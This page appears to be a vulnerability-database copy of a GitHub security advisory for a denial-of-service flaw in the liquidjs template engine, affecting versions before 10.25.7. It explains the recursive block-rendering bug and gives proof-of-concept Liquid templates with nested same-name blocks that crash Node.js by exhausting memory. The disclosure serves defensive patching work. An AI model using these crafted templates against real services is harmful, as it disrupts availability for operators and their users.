GHSA-4RC3-7J7W-M548
Vulnerability from github – Published: 2026-04-24 15:34 – Updated: 2026-04-24 15:34
VLAI?
Summary
liquidjs has a Denial of Service via circular block reference in layout
Details
Summary
A circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack.
Details
In src/tags/block.ts, during OUTPUT mode, each block looks up its render function from ctx.getRegister('blocks')[this.block]. When a block with name a is nested inside another block also named a in a child template, the inner block finds the outer block's render function and calls it. The outer block's templates contain the inner block again, creating infinite recursion with no termination condition.
Relevant code (src/tags/block.ts, getBlockRender method):
private getBlockRender (ctx: Context) {
const { liquid, templates } = this
const renderChild = ctx.getRegister('blocks')[this.block]
const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {
ctx.push({ block: superBlock })
yield liquid.renderer.renderTemplates(templates, ctx, emitter)
ctx.pop()
}
return renderChild
? (superBlock: BlockDrop, emitter: Emitter) => renderChild(
new BlockDrop(
(emitter: Emitter) => renderCurrent(superBlock, emitter)
),
emitter)
: renderCurrent
}
When renderChild exists (same-name block found), it calls renderChild which re-renders templates containing the nested block, which again finds renderChild, and so on — infinite loop.
PoC
1. Create a layout file (layout.html):
<header>{% block a %}default-a{% endblock %}</header>
<main>{% block b %}default-b{% endblock %}</main>
<footer>{% block c %}default-c{% endblock %}</footer>
2. Create a template that uses the layout:
{% layout "layout" %}
{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}
{% block b %}content-b{% endblock %}
{% block c %}content-c{% endblock %}
3. Render:
const { Liquid } = require('liquidjs')
const liquid = new Liquid({ root: './', extname: '.html' })
liquid.renderFile('template').then(console.log)
// Result: process hangs, memory grows to ~4GB, then crashes with OOM
The anonymous block variant also triggers the same issue:
{% layout "parent" %}
{%block%}A{%block%}B{%endblock%}{%endblock%}
Impact
Denial of Service (DoS). Any application that accepts user-provided or user-influenced Liquid templates — such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input — can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "liquidjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.25.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41311"
],
"database_specific": {
"cwe_ids": [
"CWE-674"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-24T15:34:00Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nA circular block reference in `{% layout %}` / `{% block %}` causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with `FATAL ERROR: JavaScript heap out of memory`. This allows any user who can submit a Liquid template to perform a Denial of Service attack.\n\n### Details\n\nIn `src/tags/block.ts`, during OUTPUT mode, each block looks up its render function from `ctx.getRegister(\u0027blocks\u0027)[this.block]`. When a block with name `a` is nested inside another block also named `a` in a child template, the inner block finds the outer block\u0027s render function and calls it. The outer block\u0027s templates contain the inner block again, creating infinite recursion with no termination condition.\n\nRelevant code (`src/tags/block.ts`, `getBlockRender` method):\n\n```typescript\nprivate getBlockRender (ctx: Context) {\n const { liquid, templates } = this\n const renderChild = ctx.getRegister(\u0027blocks\u0027)[this.block]\n const renderCurrent = function * (superBlock: BlockDrop, emitter: Emitter) {\n ctx.push({ block: superBlock })\n yield liquid.renderer.renderTemplates(templates, ctx, emitter)\n ctx.pop()\n }\n return renderChild\n ? (superBlock: BlockDrop, emitter: Emitter) =\u003e renderChild(\n new BlockDrop(\n (emitter: Emitter) =\u003e renderCurrent(superBlock, emitter)\n ),\n emitter)\n : renderCurrent\n}\n```\n\nWhen `renderChild` exists (same-name block found), it calls `renderChild` which re-renders templates containing the nested block, which again finds `renderChild`, and so on \u2014 infinite loop.\n\n### PoC\n\n**1. Create a layout file** (`layout.html`):\n\n```liquid\n\u003cheader\u003e{% block a %}default-a{% endblock %}\u003c/header\u003e\n\u003cmain\u003e{% block b %}default-b{% endblock %}\u003c/main\u003e\n\u003cfooter\u003e{% block c %}default-c{% endblock %}\u003c/footer\u003e\n```\n\n**2. Create a template that uses the layout:**\n\n```liquid\n{% layout \"layout\" %}\n{% block a %}outer-a {% block a %}inner-a{% endblock %}{% endblock %}\n{% block b %}content-b{% endblock %}\n{% block c %}content-c{% endblock %}\n```\n\n**3. Render:**\n\n```javascript\nconst { Liquid } = require(\u0027liquidjs\u0027)\nconst liquid = new Liquid({ root: \u0027./\u0027, extname: \u0027.html\u0027 })\nliquid.renderFile(\u0027template\u0027).then(console.log)\n// Result: process hangs, memory grows to ~4GB, then crashes with OOM\n```\n\nThe anonymous block variant also triggers the same issue:\n\n```liquid\n{% layout \"parent\" %}\n{%block%}A{%block%}B{%endblock%}{%endblock%}\n```\n\n### Impact\n\n**Denial of Service (DoS).** Any application that accepts user-provided or user-influenced Liquid templates \u2014 such as CMS platforms, email template builders, multi-tenant SaaS products, or static site generators with untrusted input \u2014 can be crashed by a single malicious template. The attack requires no authentication beyond the ability to submit a template, and no special configuration. The Node.js process is killed by the OS due to memory exhaustion, causing complete service disruption.",
"id": "GHSA-4rc3-7j7w-m548",
"modified": "2026-04-24T15:34:00Z",
"published": "2026-04-24T15:34:00Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0"
},
{
"type": "PACKAGE",
"url": "https://github.com/harttle/liquidjs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "liquidjs has a Denial of Service via circular block reference in layout"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…